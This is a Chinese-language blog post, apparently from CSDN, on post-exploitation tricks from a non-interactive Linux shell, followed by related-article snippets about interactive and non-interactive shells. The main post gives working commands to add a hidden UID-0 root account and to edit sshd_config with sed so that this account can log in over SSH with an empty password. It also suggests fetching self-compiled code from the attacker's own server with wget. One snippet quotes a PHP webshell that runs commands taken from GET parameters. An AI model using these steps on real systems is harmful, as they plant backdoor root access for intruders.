linux非交互命令登录,Linux非交互式shell下渗透技巧

最新推荐文章于 2022-11-02 18:40:34 发布
最新推荐文章于 2022-11-02 18:40:34 发布
阅读量172 收藏
点赞数
文章标签: linux非交互命令登录

首先添加管理员账号

执行命令

useradd -u 0 -o -g root -G root -d /home/admin admin

说明:

-u 0 指将uid指定为0(零)与root相同,登录后的提示符为#而非$.

-o 指因为重复了uid(与root帐号的uid重复)必须指定这个参数.

-g root 初始化组的组名,当用户属于多个组时,(在-G参数中指定),登录时所在组。缺省该项时,系统新建一个与用户名同名的组,并且初始化时设为该组名.而不论-G指定为哪些组.

-G root 指定用户名所属的组列表,一个用户可以属于多个组,组名间用逗号分隔,组名必须已经存在.

-d /home/admin指定用户的属主目录

admin 新建的用户名为admin.

这样就添加了一个 有root权限的账户admin

由于在非交互式shell下无法设置密码 然后SSH空密码也无法登陆 比较纠结了

这时候就要修改配置文件 /etc/ssh/sshd_config

把里面 PermitEmptyPasswords no 改为 PermitEmptyPasswords yes 即允许空密码登陆。

在非交互式shell下 该怎么修改这个配置文件里的某一行数据呢?

用sed命令可以实现

如下

sed -i 's/PermitEmptyPasswords no/PermitEmptyPasswords yes/g' file

当然也可以用c写代码来实现然后放到自己web服务器上wget过去 编译执行。

然后就可以SSH登陆了。

weixin_39732249
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux交互命令登录,Linux登录shell登录(交互式shell)环境变量配置
weixin_39689506的博客
05-03 629
使用Jenkins执行shell脚本的时候, 碰到command not found. 比如java mvn, 这些环境变量配置在/etc/profile中, 但jenkins执行的时候并没有加载.这是因为jenkins执行的shell登录交互式shell, 并不会加载/etc/profile.交互式shell会加载.bashrc, 进而会加载/etc/bashrc, 而/etc/bashrc...
linux 交互式shell,交互式shell交互式shell登录shell登录shell的区别
weixin_39588223的博客
05-13 870
在解读shell之前要把bash理解一下,把它看成一种多层的模式。要清楚shell并不是某一个时间里只能存在一个的。打个比方就是,比如我们进入一个房子,看到门,打开门进去就是进入了一个环境,但是在这里我们又发现一扇门,当我们打开这扇门进去的时候,就进入了新的环境了,这里就是新的bash。用户登录linux之后,系统会启动一个用户shell,在这个shell里,可以使用shell命令或者声明变量,也...
gladius:用于常见 Kali Linux 渗透测试任务的交互式 shell
06-02
短剑 用于常见 Kali Linux 渗透测试任务的交互式 shell 咨询 这个应用程序是Alpha,所以要小心。 从现在到 Beta 版本 v0.1,我将进行重大更改。 特征 请参阅维基: : 安装 更改目录并克隆: cd /opt;git clone https://github.com/pS3ud0RAnD0m/gladius 符号链接: ln -s /opt/gladius/gladius.rb /usr/bin/gladius;cd 从任何地方运行: gladius 更新 切换到gladius目录并拉取最新的提交: cd /opt/gladius;git pull 用法 贡献者 迈克尔·伯恩 提供的用户界面建议 阿尔法测试 改进的 Windows 词典列表 史蒂夫·皮廷格 用于识别 DC 的改进 DiG 命令 推荐的TestSSLServer 阿尔法测试
Linux交互式提权详解
01-20
前言 之前拿到某站的Webshell之后,在提权的时候发现网站不能反弹shell。而且,在渗透的时候经常遇到那种不能反弹shell的,你的提权工具拿上去之后因为没有交互式的环境,也不知道提权是否成功。因此,写了一个简单的工具。需要的朋友们可以参考学习。 方法如下 proce_open() // path是提权工具的绝对路径,例如:/usr/local/htdocs/2.6.18 // cmd是你需要执行的命令,例如:whoami if(isset($_GET['path']) && isset($_GET['cmd'])){ $path = $_GET['path']; $cmd = $
Linux交互式sshpass登录
weixin_34088838的博客
12-27 330
摘要 在命令交互的SSH登录的时候,一般我们可以借助于生成用户的公钥私钥对,然后把公钥添加到远程主机的authorized_keys文件,可以实现交互无密码登录。 其实这里也可以有另外一种方式实现,即用sshpass命令。 这种情况比较适合Mac下用iterm2 SSH登录到远程主机的时候,长时间不操...
Linux-无交互式创建用户
EmDongJO的博客
06-21 1646
# 创建用户 useradd username #创建密码 echo "password" | passwd --stdin username useradd test1;echo "1" | passwd --stdin test1
linux 交互式shell,交互式shell交互式shell
weixin_29865183的博客
05-13 216
6.3.1 What is an Interactive Shell?An interactive shellis one started without non-option arguments, unless -s isspecified, without specifying the -c option, andwhose input and error output are bothcon...
linux配置免密登录,(expect)交互式
welcome to zdsg's csdn
06-29 300
expect 交互式脚本自动输入
Linuxshell脚本免交互操作
qq_37499012的博客
11-02 572
使用I/O重定向的方式将命令列表提供给交互式程序或命令,比如ftp、cat 或read命令。HereDocument是标准输入的一种替代品,可以帮助脚本开发人员不必使用临时文件来构建输入信息,而是直接就地生产出—个文件并用作命令的标住输入。是建立在tcl(tool command language)语言基础上的一个工具,常被用于进行自动化控制和测试,解决shell脚本中交互的相关问题。
交互式shell交互式shell
weixin_34279246的博客
08-20 570
2019独角兽企业重金招聘Python工程师标准>>> ...
JAVA上百实例源码以及开源项目
01-03
 Java数据压缩与传输实例,可以学习一下实例化套按字、得到文件输入流、压缩输入流、文件输出流、实例化缓冲区、写入数据到文件、关闭输入流、关闭套接字关闭输出流、输出错误信息等Java编程小技巧。 Java数组倒置...
JAVA上百实例源码以及开源项目源代码
12-11
Java圆形电子时钟源代码 1个目标文件 内容索引:JAVA源码,系统相关,电子钟 用JAVA编写的指针式圆形电子钟,效果图如下所示,其实代码很简单,希望对你有帮助。 Message-Driven Bean EJB实例源代码 2个目标文件 摘要:...
java开源包1
06-28
WebSocket4J 是一个用 Java 实现的 WebSocket 协议的类库,可使用 Java 来构建交互式 Web 应用。WebSocket4J 并未实现客户端通讯协议,所以不能用它来连接 WebSocket 服务器。 Struts验证码插件 JCaptcha4Struts2 ...
深入浅出理解交互式shell交互式shell登录shell登录shell的区别
热门推荐
粥同学的学习笔记
01-24 1万+
首先我们需要把bash理解为一种模式,我们不如把这种模式想象成类似于洋葱一样的结构,我们可以一层一层剥开,也就是说我们可以一层一层的进入子shell。就好比我们进入一栋楼,打开一个房间是一个环境,在当前这个房间我们又看到了一个门,当我们打开这个门的时候,我们就已经进入了新的环境,也就是新的bash中。这牵扯到一个父shell和子shell的问题。  用户登录Linux系统后,系统将启动一个
登录/登录交互/交互式shell
yaoxiaoyang的博客
01-03 2969
登录登录shell的区别: 直观区分方式:是否需要输入用户名密码。 转换: 登录可以转换成登录 使用--login 考虑转换情况,相对科学的区分:既不使用密码,也不使用--login转换的是登录,其他都是登录登录登录运行shell的区别: 对于Bash来说,登录shell会首先读取和执行/etc/profile全局配置文件中的命令,然后依次查找~/.bash_profi
linux的环境变量-shell登录shell登录
epitomizelu的专栏
11-23 494
环境变量配置说明 Linux的环境变量可在多个文件中配置,如/etc/profile,/etc/profile.d/*.sh,/.bashrc,/.bash_profile等, 下面说明上述几个文件之间的关系和区别 bash的运行模式可分为login shell和non-login shell 例如,我们通过终端,输入用户名、密码,登录系统之后,得到就是一个login shell。 而当我们执行以下命令ssh node3 command,在node3 执行command的就是一个non-login
linux编程改密码,Shell 脚本中交互式修改密码
weixin_32584595的博客
04-30 126
今天在写一个shell脚本的时候发现需要设置用户的密码,而设置密码是交互式的,这样在脚本中显然是不太好的,因此上网查找资料,发现了以下两种常见的交互式设置密码的方式:1:使用chpasswdchpasswd其实是通过用户输入'用户名:密码'来更改一组用户的密码,还是一个可以批量修改密码的工具,具体的用法详见chpasswd用法,这里只做简单的介绍格式:# echo 用户名:密码 | chpass...
pyzmq-23.2.1-cp310-cp310-musllinux_1_1_x86_64.whl
最新发布
06-07
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
Linux中什么是登录shell交互式登陆 shell
05-19
Linux中,登录shell交互式登录shell是指用户登录系统时的不同shell环境。 登录shell是指用户登录系统时,由系统默认启动的shell,通常为bash,在这个shell环境中,会执行一些系统级别的配置文件,比如/etc/profile和~/.bash_profile等,用来设置全局的环境变量和别名等。 交互式登录shell是指用户在登录系统后,手动启动的新shell,比如在终端命令行中输入bash或者sh等命令,这种shell不会执行系统级别的配置文件,而是执行用户级别的配置文件,比如~/.bashrc等。 总之,登录shell交互式登录shell之间的主要区别是执行的配置文件不同,因此它们的环境变量、别名、函数等也可能不同。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值